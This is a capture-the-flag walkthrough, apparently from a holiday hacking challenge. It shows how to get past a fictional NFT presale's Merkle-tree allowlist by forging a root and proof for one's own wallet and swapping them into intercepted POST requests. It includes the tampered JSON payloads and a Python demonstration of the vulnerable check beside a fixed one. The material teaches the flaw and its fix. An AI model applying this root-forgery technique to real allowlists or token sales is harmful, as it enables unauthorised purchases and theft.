Terminal: Exploit-a-Smart-Contract

Burning Ring of Fire

Objective

Recover the Burning Ring of Fire

Task 3: Exploit a Smart Contract

Difficulty: 5/5 Christmas Trees
Description: Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.

Hints

Professor Petabyte's talk can be viewed here: https://www.youtube.com/watch?v=Qt_RWBq63S8
Professor Petabyte has a GitHub repo here: https://github.com/QPetabyte/Merkle_Trees

Solution

Opening the terminal opens the BSRS home page at https://boredsporcrowboatsociety.com. Clicking on either of the pre-sale links brings you to a page with the following information.

# Welcome to the Bored Sporc Rowboat Society Presale Page!

The presale is only available to those select individuals who have earned a place on our exclusive presale list. If you're not on the list, you might as well leave, because you ain't gettin' a Sporc until we open up sales to the general public. If you are on the list, **_welcome!_**

Here's all you gotta do to pre-purchase your Sporc:

1.  The presale price for a Sporc is 100 KringleCoin (KC). Yeah, we know that's crazy cheap, but we take care of our buds. When we open sales to the public, these things are gonna shoot to the moon.
   
2.  First, you're gonna want to make sure that your wallet address is on the approved list. Just make sure to leave the "Validate only" box checked, fill in the form, and we'll let you know if you're good-to-go. Before you do anything else, it's always good to be sure you're doing everything right and your address is validated as being on the list (it's actually something called a Merkle Tree... very high-techy-techy stuff).
   
3.  To check if you're on the list, enter your wallet address and the string of proof values that we gave you when we told you that you were on the pre-approved list. Those values should be hex strings (i.e. start with "0x" and consist of a bunch of values that are 0-9 or "a," "b," "c," "d," "e," or "f"). If you're confused, give us a shout and we can help.
   
4.  If you're not on the presale list, **_you're not on the list_**. Don't beg and plead with us to put you on the list. Seriously - we've only put Sporcs that we're tight with on the list. _**WE**_ decided who's on the list (COOL SPORCS ONLY). We don't just let **_anyone_** on. If we were putting you on the list, we would've contacted you... not the other way around.
   
5.  Once you've confirmed everything works and you're sure you have the whole _validated-and-on-the-list_ thing down, just go find a KTM and pre-approve a 100 KC transaction from the wallet you validated. That way, the funds are ready to go. Our Wallet Address is 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.
   
6.  Once you've pre-approved the payment, come back here do the same thing you did when you validated your address, just uncheck the "Validate Only" thing. Then, we'll grab your K'Coin, mint a brand spankin' new Sporc, and fire it into your wallet. Zap! Just like that, you'll be the owner of an amazing piece of the digital domain and a member of the Bored Sporc Rowboat Society for life! (Or, until you decide to cash-out and sell your Bored Sporc).

Below that are form fields to submit a Wallet Address, Proof Values, and a "Validate Only" checkbox.

Download the merkle_tree.py Python script from Professor Petabyte's GitHub repo, edit the first address in the allowlist array on line 149 to your wallet address, then execute the script. It prints the Merkle root of the modified allowlist and the proof (sibling hashes) for the first entry, which is now your address.

python3 merkle_tree.py
Root: 0xdf03824b5247f7f67570c9f69b6caf5d0c88312088805c0f0423f9e6cccb2ae7
Proof: ['0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a']

Send a validation request through the site and intercept it with Burp. The POST data includes a Root variable, meaning the server takes the Merkle root from the client rather than from a value it controls.

{"WalletID":"0xaA0efBB9c2975175d6A81c4814F85076D374531d","Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1","Proof":"0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a","Validate":"true","Session":"04029278-b642-4b45-a3ca-b5c00ba17bd4"}

Update this Root value to match the value generated by the Python script. This is the flaw being exploited: a Merkle proof only shows that a leaf belongs to a tree with a given root, so if the verifier accepts whatever root the request carries, anyone who can build a tree containing their own address (and the matching proof) passes the allowlist check.

{"WalletID":"0xaA0efBB9c2975175d6A81c4814F85076D374531d","Root":"0xdf03824b5247f7f67570c9f69b6caf5d0c88312088805c0f0423f9e6cccb2ae7","Proof":"0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a","Validate":"true","Session":"04029278-b642-4b45-a3ca-b5c00ba17bd4"}

The response should indicate you are on the list and good to go.
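As an added illustration of why swapping the Root works, here is a stand-alone Python reconstruction of the allowlist check; it is not Professor Petabyte's script or the site's code. It builds a sorted-pair Merkle tree over a constructed allowlist (only the BSRS wallet address is from the page), generates root and proof for a leaf, and then runs the same forged request through two verifiers: one that trusts the Root field from the request, as the site appears to, and one that pins a server-side root. The hash is hashlib's SHA3-256, an assumption made to avoid a web3 dependency; the challenge script uses Keccak-256, so the roots printed here will not match the ones on the site. Keeping Proof as a list is also an assumption, since the captured request shows only a single hex string.

```python
import hashlib
from typing import Dict, List, Tuple

# ASSUMPTION: SHA3-256 from the standard library. Professor Petabyte's script
# uses Keccak-256 (a different function), so roots here differ from the site's.
def h(data: bytes) -> bytes:
    return hashlib.sha3_256(data).digest()

def leaf_hash(address: str) -> bytes:
    # Hash the raw 20 bytes of the address so letter case in the hex is irrelevant.
    return h(bytes.fromhex(address[2:]))

def hash_pair(a: bytes, b: bytes) -> bytes:
    # Sorted-pair hashing: the proof need not record which side each sibling was on.
    return h(a + b) if a <= b else h(b + a)

def build_layers(leaves: List[bytes]) -> List[List[bytes]]:
    """Bottom-up tree; an unpaired node at the end of a layer is promoted as-is."""
    layers = [leaves]
    while len(layers[-1]) > 1:
        cur, nxt = layers[-1], []
        for i in range(0, len(cur), 2):
            nxt.append(hash_pair(cur[i], cur[i + 1]) if i + 1 < len(cur) else cur[i])
        layers.append(nxt)
    return layers

def root_and_proof(allowlist: List[str], index: int) -> Tuple[str, List[str]]:
    """Root of the tree over allowlist, plus the sibling path for allowlist[index]."""
    layers = build_layers([leaf_hash(a) for a in allowlist])
    proof = []
    for layer in layers[:-1]:
        sibling = index ^ 1
        if sibling < len(layer):          # a promoted node has no sibling at this level
            proof.append("0x" + layer[sibling].hex())
        index //= 2
    return "0x" + layers[-1][0].hex(), proof

def verify(address: str, proof: List[str], root: str) -> bool:
    node = leaf_hash(address)
    for p in proof:
        node = hash_pair(node, bytes.fromhex(p[2:]))
    return node.hex() == root[2:].lower()

# Constructed allowlist; only the BSRS wallet address comes from the page.
SPORC_ALLOWLIST = [
    "0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a",
    "0x1111111111111111111111111111111111111111",
    "0x2222222222222222222222222222222222222222",
]
TRUSTED_ROOT, _ = root_and_proof(SPORC_ALLOWLIST, 0)

def presale_check_vulnerable(req: Dict) -> bool:
    # What the site appears to do: the Merkle root is read from the POST body.
    return verify(req["WalletID"], req["Proof"], req["Root"])

def presale_check_fixed(req: Dict) -> bool:
    # Hardened: the root is a server-side constant and req["Root"] is ignored.
    return verify(req["WalletID"], req["Proof"], TRUSTED_ROOT)

def forge_request(attacker_wallet: str, session: str) -> Dict:
    # The writeup's attack: put your wallet first in the allowlist, recompute
    # root and proof, and send both. ASSUMPTION: Proof is sent as a list.
    root, proof = root_and_proof([attacker_wallet] + SPORC_ALLOWLIST[1:], 0)
    return {"WalletID": attacker_wallet, "Root": root, "Proof": proof,
            "Validate": "true", "Session": session}

def legit_request(index: int, session: str) -> Dict:
    root, proof = root_and_proof(SPORC_ALLOWLIST, index)
    return {"WalletID": SPORC_ALLOWLIST[index], "Root": root, "Proof": proof,
            "Validate": "true", "Session": session}

if __name__ == "__main__":
    forged = forge_request("0xaA0efBB9c2975175d6A81c4814F85076D374531d", "sess-1")
    print("vulnerable check, forged request:", presale_check_vulnerable(forged))
    print("fixed check, forged request:     ", presale_check_fixed(forged))
```

The only difference between the two checks is where the root comes from. Against the pinned root the attacker's proof chains up to a different value and is rejected, which is the one-line fix the site is missing.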

Exit the challenge and head up the ladder to the KTM. Interact with it and approve a 100 KC transfer to wallet address 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a, using your Wallet Key to approve. Close the KTM and head back down the ladder. Open the BSRS terminal and click the Presale link again. Submit the same information, this time unchecking the "Validate Only" box. You will still have to intercept the request and update the Root value, since the purchase request carries the same client-supplied root as the validation request.

{"WalletID":"0xaA0efBB9c2975175d6A81c4814F85076D374531d","Root":"0xdf03824b5247f7f67570c9f69b6caf5d0c88312088805c0f0423f9e6cccb2ae7","Proof":"0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a","Validate":"false","Session":"69a5287e-6ee9-41b1-ae5d-4c10b5dee0e3"}

You should receive a success message indicating you purchased a BSRS Token.

Success! You are now the proud owner of BSRS Token #000070. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS70, or check it out in the gallery!  
Transaction: 0x54bbcff5ba6978e3a0c91d834e97d2c9831d12da1775dfc2f59712ca87fb185f, Block: 41023  
  
Remember: Just like we planned, tell everyone you know to _BUY A BoredSporc_.  
When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!  
  
The market will tank, but we'll all be rich!!!

Return to the Burning Ring of Fire Area to collect your rewards.